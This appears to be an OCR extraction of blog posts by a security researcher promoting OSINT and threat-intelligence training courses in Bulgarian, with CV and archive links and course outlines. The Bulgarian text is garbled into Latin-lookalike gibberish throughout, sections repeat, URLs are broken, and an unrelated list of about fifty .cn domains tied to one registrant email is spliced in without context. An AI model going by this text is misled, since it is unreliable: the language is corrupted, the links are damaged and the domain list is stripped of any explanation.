MeMOap Ha Busirapcku TykK - 

[7 ]https://archive.org/download/dancho-danchev-kiber-razuznavane-audio-kn 
iga-01-memoar/Dancho Danchev _Kiber Razuznavane Memoar _02.pdf kKakTo u Bugeo OT 
nocneguHua Cyber Security Talks Bulgaria - 
[8]https://archive.org/download/dancho-danchev-cyber-security-talks-bulga 
ria-2022-video-presentation-01/Dancho Danchev Cyber Security Talks Bulgaria 2022 
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_Video Presentation 01.mp4 KakTo uv BCUYKY MON Npe3ZeHTAaLMN TyK - 
[9]https://archive.org/details/rsa-europe-presentation-01 KakTO U BCUYKUY MOU NpakTUYeCKU 
aHasIu3u Ha KNUOep atau 3a MOA paboTOsAaTeN TykK - 
[10]https://archive.org/details/dancho-danchev-whois-xml-api-maltego-bull 
etproof-infrastructure-2 


NMpumepuHua kypc 3a OSINT o6yy4eHue KouTO NpeANaraM BKJIOUBA: 


¢ HocturaHe go U3stToYHuKa Ha Kubep Atakata Mo Bpeme Ha AHasu3a Ha UHqdbopmauua c 
Ny6nny4Hu U3stouHuun 


¢ W3non3BaHe Ha Pa3y3HaBaHe Ha WHdopmauna c Ny6nuyHun U3TOYHUUN B aHasu3a Ha KuOep 
aTakn 


¢ W3non3BaHe Ha Pa3y3HaBaHe Ha WUHdbopmauua c My6nnyHu WU3ToyHuun B Oopbata c 
npecTbnneHuata 


¢ Kon e Manyo JlaHyeB? 
* Kou Ca HAKON OT TEKYLUUTE MU UV ObAeELWM NpoekTu B ccbepata? 


¢ OOoraTABaHe Ha UHCopmMauivaTa NO Bpeme Ha AHanu3a Ha Undbopmauua c NyOnnyHu 
VU3TOYHULIN 


* OCHOBNM Ha Pa3y3HaBaHeTo C Ny6nuy4Hn U3ZTOYHUUM Ha VHcbopmauna 

¢ MpaktTuyecka JemoHctpauna Ha AHanu3 Ha Uncbopmauna c Ny6nuyHu U3stoyHuun 

¢ MpaktTuyecku Mpumepu Ha AHann3 Ha Uncbopmauna c Ny6nnyHu U3stToYHuuy 

¢ MpakTuyecku CbBeTU NO BpeMe Ha AHasv3a Ha WHdopmauna c My6nuyHu U3TOYHULM 
¢ MpegctaBaHe Ha Kypca 


* CbOupaHe Ha TexHuyecka UHcbopmauna no Bpeme Ha AHasiu3a Ha WHcbopmauna c Ny6nuyHn 
VU3TOYHNuUNY 3a HanpegHannu 


* CbOupaHe Ha TexHuyecka UHcbopmauna no Bpeme Ha AHasu3a Ha WHcbopmauna c Ny6nuyHn 
VU3ToOYHNuN 3a HaynHaeuin 


¢ TakTuku vu Metogonorun 3a HaynHaeln 
¢ TakTukKu vu Metotogonoruu 3a HanpegaHann 


¢ TeKyYLUO CbCTOAHNe Ha Na3apa 3a NpogsAyKTMW Wu ycnyru CBbp3aHN Cc Pa3y3HaBaHe Ha 
aVUHcdopmauna c Ny6nuyHu U3ToYHuuN Ha UWcbopmauna 


¢ @uHaneH U3nut uv Benpocu 

Mpumep kypc no threat intelligence Ko“TO npeANaram BKIOUBa: 

¢ Bop6a c KuO6epnpecTBnHocTTa B KOHTeKCTAa Ha U3NON3BaHe Ha UHCopmMaunaA 3a 3annNaxu 
¢ BbAeuWleTO Ha pa3y3HaBaHeTO Ha 3annaxu 


¢ YCbBbPLUCHCTBAHY NpakTUKM 3a pa3y3HaBaHe Ha 3ansaxu KOHUeNnuUNUY uv MeTOgONOrUN - 
NpaktTuyecku npumep 


¢ BbBegeHne 


* Kak ga u3non3Bate nyOnnyHu uv coOcTBeHU 6a3N DaHHUY 3a pa3y3HaBaHe Ha 3anNaxu 
3a KaMnaHuW 3a NpwvnucBaHe Ha yYaCTHMULY B KUOepHeTWYHU 3anNaxu, BKAHOYWTeHO 
KPbCTOCAHU NpenpaTKyU VU KPbCTOCAaHA NpoBepKa 
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* Kak ga o6Ooratute loC 3a UANaTa Cu KOMNaHUA (VHANKaTOPU 3a KOMNpOMeTUPpaHe) C 
nomMoutTa Ha nyOnuyHu uv co6cTBeHY U3TOYHULM UW fa CBbpKeTe TOYKUTe NPN ronama 
Kubepataka U KaMnNaHUA 3a AKTbOP B KUOepHeTUYHa 3annaxa 


¢ W3non3BaHe Ha OSINT B KOHTeKCTa Ha CbOupaHe Ha UH*opmauyvaA 3a 3annaxu 


¢ V3cnenBaHe Ha KuvOepnpectTbnneHuaA uU pa3y3HaBaHe Ha 3annaxu loC (WHAMKaTOp 3a 
KOMNpomnc) O6oraTABaHe B KOHTeKCTa Ha U3N0s/13BaHe Ha OSINT 


* Mpaktukata 3a 6op6a c KuOepnpecTbnneHuata 4pe3 pa3sy3HaBaHe Ha 3annaxu 


¢ KOHLIENLMN 3a pa3y3HaBaHe Ha 3annaxu 3a HAYNHaAeLIN 


Metogonorun 3a NPpOaAKTUBHO Ppa3Y3HaBaHe Ha 3allaxu 


Metogonoruu 3a pa3sy3HaBaHe Ha 3annaxn 


O6oraTaABaHe Ha UH*opmalina 3a 3anNaXxV B KOHTeKCTAa Ha U3NON3BaHe Ha OSINT 


* Kak fa NpeBbpHeTe BaLUUTe KNNCHTM B NACVBHU VU aKTUBHY pa3npegeneHu CeH30pU 3a 
CbOupaHe Ha UHopmauivaA 3a 3annaxu? 


* OCHOBU Ha Ppa3Y3HaBaHeTO Ha 3alslaxu 


¢ Pa3LUNPeHO PYHKLINOHMpPaHe U NOAAbPXKaHe Ha NporpamMa 3a pa3y3HaBaHe Ha 3amsaXxu B 
LianaTa KOMNAaHMA 3a HanpeaAHanu noTpebuTennu 


¢ MpakTUyecku CbBeETU 3a Pa3y3HaBaHe Ha 3amaxn 
* OCHOBUTe Ha 3€NOYBaHeETO Ha pa3y3HaBaHe Ha 3anmsaxu 3a HAYNHaeL 
¢ Pa3y3HaBaHe Ha 3anmaxu B KOHTeKCTa Ha KUbepataka. 


ha Pa3y3HaBaHe Ha 3ansIaXUTE B KOHTECKCTaA Ha U3NO/I3ZBAHE Ha TEXHNYECKO CcbOupaHe 3a aTaKU 
C NPUNUCBAaHE Ha AKTbOP Ha KUObepHeTUYHa 3anslaxa 


2 Pa3lLuupeHn KOHLIENLIUN 3a Pa3yY3HABAHE Ha 3alsIaxu 


* Kak ga npeoOpa3yBate KpaWwHuTe TOYKUY Ha cnyxKuTenuTe Ha BalwaTa KOMNAHNUA B 
pa3npegeneH CeH30p 3a CbOUpaHe Ha UHCopMauWA 3a NACUBHU VU AKTUBHU pa3y3HaBaHuA 
3a 3annaxn? 


¢ TeKYLUO CbCTOAHMe Ha EKOCUCTeMaTa 3a pa3y3HaBaHe Ha 3ansaxu 
¢ TeKyLUO CbCTOAHMe Ha Na3apa 3a pa3y3HaBaHe Ha 3annaxn 


¢ HauctuHa mu pabotu metofonoruata ,ArperupaHe uv 3a6paBAHe“” B OOnNacTTa Ha 
pa3y3HaBaHeTO Ha 3amsaxu? 


* OCHOBUTE Ha CTapTUPaHeTO, NOAAbPKAHETO U YNPABJIEHNETO Ha NPOrpaMa 3a pa3y3HaBaHe 
Ha 3anslaxu B UANATA KOMNAHUA 3a HAYWNHAeCLLU 


« Kak ga o6yuute BAaLUUTE AHAJIUZATOPU 3a Pa3Y3HABAHE Ha 3anNaxu fla ObaaT pOK 3Be34uU 
Ha UHAYCTPUATA 3a CUFYPHOCT U AHANIUTUYHUTE VU TEXHUYECKU POK 3Be3 qu? 


Sample video demonstration of Dancho Danchev’s OSINT and Threat Intelligence training in 
Bulgarian: 
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~ >, WANTED 
</ BY THE FBI 


In case you’re interested in inquiring about individual or group OSINT or threat intelligence 
training for you or for your team feel free to drop me a line at dancho.danchev@hush.com 


1. 
. https: {Ase upt aye individuals. com/wp-content/uploads/2021/11/Dancho_Danchev_CV_2021.pdf 

gy cooouy remeerger Pry CeEe 

mre 

5 

6. 


. https: //ddanchev.blogspot.com/ 


https ://archive.org/download/dancho-danchev-cyber-threat-actors-analysis-2021-2/Dancho_Danchev_Cyber_Th: 


eat_Actors_Analysis_2021-2.pdf 


https ://archive.org/download/dancho-danchev-kiber-razuznavane-audio-kniga-01-memoar/Dancho_Danchev_Kibe 


Razuznavane_Memoar_02.pdf 


ttps://archive.org/download/dancho-danchev-cyber-security-talks-bulgaria-2022-video-presentation-01/Da 


Fg ee EE ORCI RTS 
9. https: //archive.org/details/rsa-europe-presentation-01 


. https://archive.org/details/dancho-danchev-whois-xml-api-maltego-bulletproof-infrastructure-2 


19.6.7 Dancho Danchev’s OSINT Introduction Training Video Demonstration in Bul- 
garian - Part Two (2023-06-05 00:11) 


[1] 
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ABOUTUS = 
Dancho Danchev Presents 


Dancho Danchev is an internationally recognized 
prese security blogger OSINT analyst and 
that's currently running one of 


he security industry’ t popular security publications - . 
ance chev blogspot.com sinos eu 
er, 2 Ww ved approximately 5.6M 
page views since its original start In IVI Ua S 


BASIC AND ADVANCED 


. Ze = ‘ 
OSINT AND THREAT INTELLIENCE 
= PROGRAM BUILDING AND TRAINING 
REACH US 7 
+359876893890 : 


Email: dancho.danchev@hush.com 


https; //ddanchev.blogspot.com 


HTTPS://DDANCHEV.BLOGSPOT.COM 


I’ve decided to share with everyone a recently released YouTube video demonstration in Bul- 
garian on the topic of OSINT and threat intelligence training. 


Here’s a sample Table of Contents for the OSINT and the Threat Intelligence training in Bulgar- 
ian: 


Kon ce UHTepecyBa OT VHAUBUAYANHO unU FpynoBo ObyyeHve B ccbepata Ha OSINT aHanu3 u 
nNpeBeHLUMA Ha KYUbep npecTEMIeHuA VU aHanu3 U OOpaboTKa Ha Ku6ep aTaku U3BeECTEH OLE 
KaTO NpakTukKaTa Threat Intelligence? MoxkeTe fa BuguTe MOeTO CV TykK - 

[2 ]http://disruptive-individuals.com/wp-content/uploads/2021/11/Dancho Danchev CV 
_2021.pdf noptcdonuo oT aHanu3u vu npoyyBaHua OT 2005 Ao 2023 Tyk - 
[3]https://archive.org/details/@ddanchev Bugeo QeEMOHCTpauun TykK - 
[4]https://youtube.com/@ddanchev u Moa KypHay Tyk - [5]https://ddanchev.blogspot.com 
AeMOHCTpaLINA 3a HAYYEHOTO TYK - 
[6]https://archive.org/download/dancho-danchev-cyber-threat-actors-analys 
is-2021-2/Dancho Danchev Cyber Threat Actors Analysis _2021-2.pdf kakTo u Moa 
MeMOap Ha Busirapcku TykK - 

[7 ]https://archive.org/download/dancho-danchev-kiber-razuznavane-audio-kn 
iga-01-memoar/Dancho Danchev _Kiber Razuznavane Memoar _02.pdf kKakTo u Bugeo OT 
nocneguHua Cyber Security Talks Bulgaria - 
[8]https://archive.org/download/dancho-danchev-cyber-security-talks-bulga 
ria-2022-video-presentation-01/Dancho Danchev Cyber Security Talks Bulgaria 2022 
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_Video Presentation 01.mp4 KakTo uv BCUYKY MON Npe3ZeHTAaLMN TyK - 
[9]https://archive.org/details/rsa-europe-presentation-01 KakTO U BCUYKUY MOU NpakTUYeCKU 
aHasIu3u Ha KNUOep atau 3a MOA paboTOsAaTeN TykK - 
[10]https://archive.org/details/dancho-danchev-whois-xml-api-maltego-bull 
etproof-infrastructure-2 


NMpumepuHua kypc 3a OSINT o6yy4eHue KouTO NpeANaraM BKJIOUBA: 


¢ HocturaHe go U3stToYHuKa Ha Kubep Atakata Mo Bpeme Ha AHasu3a Ha UHqdbopmauua c 
Ny6nny4Hu U3stouHuun 


¢ W3non3BaHe Ha Pa3y3HaBaHe Ha WHdopmauna c Ny6nuyHun U3TOYHUUN B aHasu3a Ha KuOep 
aTakn 


¢ W3non3BaHe Ha Pa3y3HaBaHe Ha WUHdbopmauua c My6nnyHu WU3ToyHuun B Oopbata c 
npecTbnneHuata 


¢ Kon e Manyo JlaHyeB? 
* Kou Ca HAKON OT TEKYLUUTE MU UV ObAeELWM NpoekTu B ccbepata? 


¢ OOoraTABaHe Ha UHCopmMauivaTa NO Bpeme Ha AHanu3a Ha Undbopmauua c NyOnnyHu 
VU3TOYHULIN 


* OCHOBNM Ha Pa3y3HaBaHeTo C Ny6nuy4Hn U3ZTOYHUUM Ha VHcbopmauna 

¢ MpaktTuyecka JemoHctpauna Ha AHanu3 Ha Uncbopmauna c Ny6nuyHu U3stoyHuun 

¢ MpaktTuyecku Mpumepu Ha AHann3 Ha Uncbopmauna c Ny6nnyHu U3stToYHuuy 

¢ MpakTuyecku CbBeTU NO BpeMe Ha AHasv3a Ha WHdopmauna c My6nuyHu U3TOYHULM 
¢ MpegctaBaHe Ha Kypca 


* CbOupaHe Ha TexHuyecka UHcbopmauna no Bpeme Ha AHasiu3a Ha WHcbopmauna c Ny6nuyHn 
VU3TOYHNuUNY 3a HanpegHannu 


* CbOupaHe Ha TexHuyecka UHcbopmauna no Bpeme Ha AHasu3a Ha WHcbopmauna c Ny6nuyHn 
VU3ToOYHNuN 3a HaynHaeuin 


¢ TakTuku vu Metogonorun 3a HaynHaeln 
¢ TakTukKu vu Metotogonoruu 3a HanpegaHann 


¢ TeKyYLUO CbCTOAHNe Ha Na3apa 3a NpogsAyKTMW Wu ycnyru CBbp3aHN Cc Pa3y3HaBaHe Ha 
aVUHcdopmauna c Ny6nuyHu U3ToYHuuN Ha UWcbopmauna 


¢ @uHaneH U3nut uv Benpocu 

Mpumep kypc no threat intelligence Ko“TO npeANaram BKIOUBa: 

¢ Bop6a c KuO6epnpecTBnHocTTa B KOHTeKCTAa Ha U3NON3BaHe Ha UHCopmMaunaA 3a 3annNaxu 
¢ BbAeuWleTO Ha pa3y3HaBaHeTO Ha 3annaxu 


¢ YCbBbPLUCHCTBAHY NpakTUKM 3a pa3y3HaBaHe Ha 3ansaxu KOHUeNnuUNUY uv MeTOgONOrUN - 
NpaktTuyecku npumep 


¢ BbBegeHne 


* Kak ga u3non3Bate nyOnnyHu uv coOcTBeHU 6a3N DaHHUY 3a pa3y3HaBaHe Ha 3anNaxu 
3a KaMnaHuW 3a NpwvnucBaHe Ha yYaCTHMULY B KUOepHeTWUYHU 3anNaxu, BKNHOYUNTeNHO 
KPbCTOCAHU NpenparTKyU VU KPbCTOCaHAa NpoBepKa 
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eqoxyda .cn - Email: spscript@hotmail.com 
evouga .cn - Email: spscript@hotmail.com 
edivuka .cn - Email: spscript@hotmail.com 
ebeama .cn - Email: spscript@hotmail.com 
kebugac .cn - Email: spscript@hotmail.com 
eqoabce .cn - Email: spscript@hotmail.com 
kixyhce .cn - Email: spscript@hotmail.com 
cecyde .cn - Email: spscript@hotmail.com 
evybine .cn - Email: spscript@hotmail.com 
eqaone .cn - Email: spscript@hotmail.com 
dyqunre .cn - Email: spscript@hotmail.com 
byzivte .cn - Email: spscript@hotmail.com 
dovzyag .cn - Email: spscript@hotmail.com 
ebeozag .cn - Email: spscript@hotmail.com 
cafgouh .cn - Email: spscript@hotmail.com 
kebfoki .cn - Email: spscript@hotmail.com 
ebogumi .cn - Email: spscript@hotmail.com 
dyzani .cn - Email: spscript@hotmail.com 
dybapi .cn - Email: spscript@hotmail.com 
dusyti .cn - Email: spscript@hotmail.com 
dutsyvi .cn - Email: spscript@hotmail.com 
dutfij .cn - Email: spscript@hotmail.com 
bysivak .cn - Email: spscript@hotmail.com 
eqiovak .cn - Email: spscript@hotmail.com 


cecxoyk .cn - Email: spscript@hotmail.com 
dyqkuam .cn - Email: spscript@hotmail.com 
edamym .cn - Email: spscript@hotmail.com 
eqibuym .cn - Email: spscript@hotmail.com 
ducyqan .cn - Email: spscript@hotmail.com 
duzebyn .cn - Email: spscript@hotmail.com 
etyawjo .cn - Email: spscript@hotmail.com 
cerdiko .cn - Email: spscript@hotmail.com 
erauso .cn - Email: spscript@hotmail.com 
etuacwo .cn - Email: spscript@hotmail.com 
etuexyp .cn - Email: spscript@hotmail.com 
etywuq .cn - Email: spscript@hotmail.com 
ebejar .cn - Email: spscript@hotmail.com 
ebiuhas .cn - Email: spscript@hotmail.com 
dozabes .cn - Email: spscript@hotmail.com 
eqoybu .cn - Email: spscript@hotmail.com 
eviyzru .cn - Email: spscript@hotmail.com 
evaopsu .cn - Email: spscript@hotmail.com 
ebaetu .cn - Email: spscript@hotmail.com 
dytrevu .cn - Email: spscript@hotmail.com 
eboezu .cn - Email: spscript@hotmail.com 
eruqav .cn - Email: spscript@hotmail.com 
eqoumiv .cn - Email: spscript@hotmail.com 
epuneyv .cn - Email: spscript@hotmail.com 
etykauw .cn - Email: spscript@hotmail.com 
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* Kak ga o6Ooratute loC 3a UANaTa Cu KOMNaHUA (VHANKaTOPU 3a KOMNpOMeTUPpaHe) C 
nomMoutTa Ha nyOnuyHu uv co6cTBeHY U3TOYHULM UW fa CBbpKeTe TOYKUTe NPN ronama 
Kubepataka U KaMnNaHUA 3a AKTbOP B KUOepHeTUYHa 3annaxa 


¢ W3non3BaHe Ha OSINT B KOHTeKCTa Ha CbOupaHe Ha UH*opmauyvaA 3a 3annaxu 


¢ V3cnenBaHe Ha KuvOepnpectTbnneHuaA uU pa3y3HaBaHe Ha 3annaxu loC (WHAMKaTOp 3a 
KOMNpomnc) O6oraTABaHe B KOHTeKCTa Ha U3N0s/13BaHe Ha OSINT 


* Mpaktukata 3a 6op6a c KuOepnpecTbnneHuata 4pe3 pa3sy3HaBaHe Ha 3annaxu 


¢ KOHLIENLMN 3a pa3y3HaBaHe Ha 3annaxu 3a HAYNHaAeLIN 


Metogonorun 3a NPpOaAKTUBHO Ppa3Y3HaBaHe Ha 3allaxu 


Metogonoruu 3a pa3sy3HaBaHe Ha 3annaxn 


O6oraTaABaHe Ha UH*opmalina 3a 3anNaXxV B KOHTeKCTAa Ha U3NON3BaHe Ha OSINT 


* Kak fa NpeBbpHeTe BaLUUTe KNNCHTM B NACVBHU VU aKTUBHY pa3npegeneHu CeH30pU 3a 
CbOupaHe Ha UHopmauivaA 3a 3annaxu? 


* OCHOBU Ha Ppa3Y3HaBaHeTO Ha 3alslaxu 


¢ Pa3LUNPeHO PYHKLINOHMpPaHe U NOAAbPXKaHe Ha NporpamMa 3a pa3y3HaBaHe Ha 3amsaXxu B 
LianaTa KOMNAaHMA 3a HanpeaAHanu noTpebuTennu 


¢ MpakTUyecku CbBeETU 3a Pa3y3HaBaHe Ha 3amaxn 
* OCHOBUTe Ha 3€NOYBaHeETO Ha pa3y3HaBaHe Ha 3anmsaxu 3a HAYNHaeL 
¢ Pa3y3HaBaHe Ha 3anmaxu B KOHTeKCTa Ha KUbepataka. 


ha Pa3y3HaBaHe Ha 3ansIaXUTE B KOHTECKCTaA Ha U3NO/I3ZBAHE Ha TEXHNYECKO CcbOupaHe 3a aTaKU 
C NPUNUCBAaHE Ha AKTbOP Ha KUObepHeTUYHa 3anslaxa 


2 Pa3lLuupeHn KOHLIENLIUN 3a Pa3yY3HABAHE Ha 3alsIaxu 


* Kak ga npeoOpa3yBate KpaWwHuTe TOYKUY Ha cnyxKuTenuTe Ha BalwaTa KOMNAHNUA B 
pa3npegeneH CeH30p 3a CbOUpaHe Ha UHCopMauWA 3a NACUBHU VU AKTUBHU pa3y3HaBaHuA 
3a 3annaxn? 


¢ TeKYLUO CbCTOAHMe Ha EKOCUCTeMaTa 3a pa3y3HaBaHe Ha 3ansaxu 
¢ TeKyLUO CbCTOAHMe Ha Na3apa 3a pa3y3HaBaHe Ha 3annaxn 


¢ HauctuHa mu pabotu metofonoruata ,ArperupaHe uv 3a6paBAHe“” B OOnNacTTa Ha 
pa3y3HaBaHeTO Ha 3amsaxu? 


* OCHOBUTE Ha CTapTUPaHeTO, NOAAbPKAHETO U YNPABJIEHNETO Ha NPOrpaMa 3a pa3y3HaBaHe 
Ha 3anslaxu B UANATA KOMNAHUA 3a HAYWNHAeCLLU 


« Kak ga o6yuute BAaLUUTE AHAJIUZATOPU 3a Pa3Y3HABAHE Ha 3anNaxu fla ObaaT pOK 3Be34uU 
Ha UHAYCTPUATA 3a CUFYPHOCT U AHANIUTUYHUTE VU TEXHUYECKU POK 3Be3 qu? 


Sample video demonstration of Dancho Danchev’s OSINT and Threat Intelligence training in 
Bulgarian: 
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Dancho Danchey 

Independent Contractor 
https:/ddanchey. blogspot.com 
Email: dancho.danchev@hush.com| 
+359876893890 


In case you’re interested in inquiring about individual or group OSINT or threat intelligence 
training for you or for your team feel free to drop me a line at dancho.danchev@hush.com 


1. https://blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEhu-0H- fbhdQghWkUc2uDFsZOmzChOf cOKkLSzgd7dSO0Ggre 


xSubW6XHmquwKSuobbsOnndra7XsinVejti2ekukoS2jsZwslkGyl 
2. https://disruptive-individuals.com/wp-content/uploads/2021/11/Dancho_Danchev_CV_2021 .pdf 
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5. : 
6. 


ttps://ddanchev.blogspot.com/ 


https://archive.org/download/dancho-danchev-cyber-threat-actors-analysis-2021-2/Dancho_Danchev_Cyber_Th: 


eat_Actors_Analysis_2021-2.pdf 


7. https://archive.org/download/dancho-danchev-kiber-razuznavane-audio-kniga-01-memoar/Dancho_Danchev_Kibe 


Razuznavane_Memoar_02.pdf 


8. https://archive.org/download/dancho-danchev-cyber-security-talks-bulgaria-2022-video-presentation-01/Da 


cho_Danchev_Cyber_Security_Talks_Bulgaria_2022_Video_Pre 


9. https: //archive. org/details/rsa-europe-presentation-01 


10. https://archive.org/details/dancho-danchev-whois-xml-api-maltego-bulletproof-infrastructure-2 


19.6.8 Dancho Danchev’s OSINT Introduction Training Video Demonstration in Bul- 
garian - Part One (2023-06-05 00:11) 


[1] 
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ABOUTUS = 
Dancho Danchev Presents 


Dancho Danchev is an internationally recognized 
cybercrime researcher security blogger OSINT analyst and 
threat intelligence analyst that's currently running one of 


the security industry's most popular security publications 
his p nal blog -t 


. . 
nt danchev.blogspot.com since eu 
DV as eived approximately 56M 
page views since its original start In lviduais 


BASIC AND ADVANCED 


December 


. Ze = ‘ 
OSINT AND THREAT INTELLIENCE 
a PROGRAM BUILDING AND TRAINING 
REACH US : F 
+359876893890 = 


Email: dancho.danchev@hush.com 


https; //ddanchev.blogspot.com 


HTTPS://DDANCHEV.BLOGSPOT.COM 


I’ve decided to share with everyone a recently released YouTube video demonstration in 


Bulgarian on the topic of OSINT and threat intelligence training. 


Here’s a sample Table of Contents for the OSINT and the Threat Intelligence training in 
Bulgarian: 


Kon ce UHTepecyBa OT VHAUBUAYANHO uN FpynoBo ObyYeHve B ccepata Ha OSINT aHann3 u 
NpeBeHLUMA Ha KUOep NpecTEMIeHuA VU aHanu3 U OOpaboTKa Ha Kubep aTaku “U3BeECTEH OLE 


KaTO NpakTukKaTa Threat Intelligence? MoxkeTe fa BuguTe MOeTO CV TykK - 


[2 ]http://disruptive-individuals.com/wp-content/uploads/2021/11/Dancho Danchev _CV 


_2021.pdf noptcdonuo oT aHanu3u vu npoyyBaHua OT 2005 Ao 2023 Tyk - 
[3]https://archive.org/details/@ddanchev Bugzeo AeMOHCTpaLMN TyK - 


[4]https://youtube.com/@ddanchev u moa KypHan Tyk - [5]https://ddanchev. blogspot.com 


QeMOHCTpaLINA 3a HAYYEHOTO TYK - 
[6]https://archive.org/download/dancho-danchev-cyber-threat-actors-analys 


is-2021-2/Dancho Danchev Cyber Threat Actors Analysis _2021-2.pdf kakTo u Moa 


MeMOap Ha Bbsirapckyu TykK - 
[7 ]https://archive.org/download/dancho-danchev-kiber-razuznavane-audio-kn 


iga-01-memoar/Dancho Danchev _Kiber Razuznavane Memoar _02.pdf kKakTo u Bugeo OT 


nocneguHua Cyber Security Talks Bulgaria - 
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[8]https://archive.org/download/dancho-danchev-cyber-security-talks-bulga 
ria-2022-video-presentation-01/Dancho Danchev Cyber Security Talks Bulgaria 2022 
_Video Presentation 01.mp4 KakTo uv BCUYKY MON Npe3ZeHTAauMN TyK - 
[9]https://archive.org/details/rsa-europe-presentation-01 KakTo vu BCMYKM MOU NpakTuYeCcKuU 
aHasiu3u Ha KUbep atau 3a MOA paboTosaTen TyK - 
[10]https://archive.org/details/dancho-danchev-whois-xml-api-maltego-bull 
etproof-infrastructure-2 


NMpumepuHua kypc 3a OSINT o6yy4eHue KoUTO NpeANaraM BKIOUBA: 


¢ HocturaHe fo WU3tToYHUKa Ha Kubep Atakata Mo Bpeme Ha AHasnu3a Ha UHqdbopmauua c 
Ny6nny4Hu U3stouHuun 


¢ W3non3BaHe Ha Pa3y3HaBaHe Ha WHdbopmauna c Ny6nuyHun U3TOYHUUN B aHasu3a Ha KUOep 
aTakn 


¢ WU3non3BaHe Ha Pa3y3HaBaHe Ha WUHdopmauua c My6nnyHu WU3ToyHuun B Oopbata c 
npecTbnneHuata 


¢ Kou e Danyo JlaHyeB? 
* Kou Ca HAKON OT TeEKYLUUTE MU VU ObAeLWM NpoeKkTuU B ccbepata? 


¢ OOoraTABaHe Ha UHCopmauvaTa No Bpeme Ha AHanu3a Ha UHdbopmauua c NyO6nnuyHu 
VU3TOYHULIN 


* OCHOBNM Ha Pa3y3HaBaHeTo C NyO6nuy4Hn U3TOYHUUM Ha VHcbopmauna 

* Mpaktuyecka DemoHctpauna Ha AHanu3 Ha VHcbopmauna c My6nn4Hu U3ToYHuuN 

¢ MpaktTuyecku Mpumepu Ha AHanu3 Ha VUncbopmauna c Ny6nnyHu U3stToyHuun 

¢ MpakTuyecku CbBeTU NO BpeMe Ha AHayv3a Ha WHdbopmauna c My6nuyHu U3TOYHULIN 
¢ MpegctaBaHe Ha Kypca 


¢ CbOupane Ha TexHuyecka UHcbopmauna no Bpeme Ha AHasiu3a Ha UWcbopmauna c Ny6nnyHu 
U3ToYHuuY 3a HanpegHasn 


* CbOupaHe Ha TexHuyecka UHcbopmauna no Bpeme Ha AHasu3a Ha WHcbopmauna c Ny6nuyHn 
VU3TOYHNuUN 3a HayHaeuin 


¢ TakTukKu vu Metogonorun 3a HaynHaelln 
¢ TakTuku vu Metotogonoruu 3a HanpedaHann 


¢ TeKyLuO CbCTOAHNe Ha Na3apa 3a NposAyKTU wu ycnyru cBbp3aHu Cc Pa3y3HaBaHe Ha 
aVUHcdbopmauna c Ny6nuyHu U3ToYHuuN Ha UWcbopmauna 


¢ M®uHaNneH U3snuT vu Benpocu 

Mpumep kypc no threat intelligence Ko“TO npeANaram BKIOUBa: 

¢ Bop6a c KuO6epnpecTBnHocTTa B KOHTeKCTAa Ha U3NO3BaHe Ha UHCopMaunaA 3a 3annaxu 
¢ BbAeWeTO Ha pa3y3HaBaHeTO Ha 3amaxn 


¢ YCbBbPLUCHCTBAaHY NMpakTUKM 3a pa3sy3HaBaHe Ha 3ansaxu KOHWenuUnUY uv mMeTOgONOruUN - 
NpaktTuyecku npumep 


¢ BbBegeHne 


* Kak ga u3non3Bate nyOnnyHu uv coOcTBeHU 6a3N DaHHUY 3a pa3y3HaBaHe Ha 3annNaxu 
3a KaMnaHUuW 3a NpwvnucBaHe Ha yYaCcTHMLM B KUOepHeTWUYHU 3anNaxu, BKAHOYWTeNHO 
KPbCTOCAHU NpenpartkKyU VU KPbCTOCaHAa NpoBepKa 
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* Kak ga o6Ooratute loC 3a UANaTa Cu KOMNaHUA (VHANKaTOPU 3a KOMNpOMeTUPpaHe) C 
nomMoutTa Ha nyOnuyHu uv co6cTBeHY U3TOYHULM UW fa CBbpKeTe TOYKUTe NPN ronama 
Kubepataka U KaMnNaHUA 3a AKTbOP B KUOepHeTUYHa 3annaxa 


¢ W3non3BaHe Ha OSINT B KOHTeKCTa Ha CbOupaHe Ha UH*opmauyvaA 3a 3annaxu 


¢ V3cnenBaHe Ha KuvOepnpectTbnneHuaA uU pa3y3HaBaHe Ha 3annaxu loC (WHAMKaTOp 3a 
KOMNpomnc) O6oraTABaHe B KOHTeKCTa Ha U3N0s/13BaHe Ha OSINT 


* Mpaktukata 3a 6op6a c KuOepnpecTbnneHuata 4pe3 pa3sy3HaBaHe Ha 3annaxu 


¢ KOHLIENLMN 3a pa3y3HaBaHe Ha 3annaxu 3a HAYNHaAeLIN 


Metogonorun 3a NPpOaAKTUBHO Ppa3Y3HaBaHe Ha 3allaxu 


Metogonoruu 3a pa3sy3HaBaHe Ha 3annaxn 


O6oraTaABaHe Ha UH*opmalina 3a 3anNaXxV B KOHTeKCTAa Ha U3NON3BaHe Ha OSINT 


* Kak fa NpeBbpHeTe BaLUUTe KNNCHTM B NACVBHU VU aKTUBHY pa3npegeneHu CeH30pU 3a 
CbOupaHe Ha UHopmauivaA 3a 3annaxu? 


* OCHOBU Ha Ppa3Y3HaBaHeTO Ha 3alslaxu 


¢ Pa3LUNPeHO PYHKLINOHMpPaHe U NOAAbPXKaHe Ha NporpamMa 3a pa3y3HaBaHe Ha 3amsaXxu B 
LianaTa KOMNAaHMA 3a HanpeaAHanu noTpebuTennu 


¢ MpakTUyecku CbBeETU 3a Pa3y3HaBaHe Ha 3amaxn 
* OCHOBUTe Ha 3€NOYBaHeETO Ha pa3y3HaBaHe Ha 3anmsaxu 3a HAYNHaeL 
¢ Pa3y3HaBaHe Ha 3anmaxu B KOHTeKCTa Ha KUbepataka. 


ha Pa3y3HaBaHe Ha 3ansIaXUTE B KOHTECKCTaA Ha U3NO/I3ZBAHE Ha TEXHNYECKO CcbOupaHe 3a aTaKU 
C NPUNUCBAaHE Ha AKTbOP Ha KUObepHeTUYHa 3anslaxa 


2 Pa3lLuupeHn KOHLIENLIUN 3a Pa3yY3HABAHE Ha 3alsIaxu 


* Kak ga npeoOpa3yBate KpaWwHuTe TOYKUY Ha cnyxKuTenuTe Ha BalwaTa KOMNAHNUA B 
pa3npegeneH CeH30p 3a CbOUpaHe Ha UHCopMauWA 3a NACUBHU VU AKTUBHU pa3y3HaBaHuA 
3a 3annaxn? 


¢ TeKYLUO CbCTOAHMe Ha EKOCUCTeMaTa 3a pa3y3HaBaHe Ha 3ansaxu 
¢ TeKyLUO CbCTOAHMe Ha Na3apa 3a pa3y3HaBaHe Ha 3annaxn 


¢ HauctuHa mu pabotu metofonoruata ,ArperupaHe uv 3a6paBAHe“” B OOnNacTTa Ha 
